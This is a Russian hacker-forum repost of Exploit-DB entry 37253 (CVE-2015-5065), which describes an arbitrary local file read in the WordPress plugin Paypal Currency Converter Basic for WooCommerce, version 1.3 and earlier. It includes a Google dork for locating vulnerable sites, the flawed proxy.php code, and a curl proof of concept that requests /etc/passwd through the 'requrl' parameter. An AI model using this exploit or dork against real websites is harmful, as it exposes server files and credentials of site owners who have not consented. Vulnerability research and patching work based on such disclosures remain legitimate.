Exploit WordPress Plugin Paypal Currency Converter Basic For WooCommerce - File Read

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
37253
Проверка EDB
  1. Пройдено
Автор
KUROI'SH
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2015-5065
Дата публикации
2015-06-10
WordPress Plugin Paypal Currency Converter Basic For WooCommerce - File Read
Код:
# Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read
# Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link:
https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/
# Version: <=1.3
# Tested on: Linux
 Description:
 proxy.php's code:
 <?php
$file = file_get_contents($_GET['requrl']);
$left=strpos($file,'<div id=currency_converter_result>');
$right=strlen($file)-strpos($file,'<input type=hidden name=meta');
$snip= substr($file,$left,$right);
echo $snip;
?>
Based on user input, the content of a file is printed out (unfortunately
not included) so any html file can be loaded, and an attacker may be able
to read  any local file which
is not executed in the server.
Example:
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
POC:
curl --silent --url
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
 
Источник
www.exploit-db.com

Похожие темы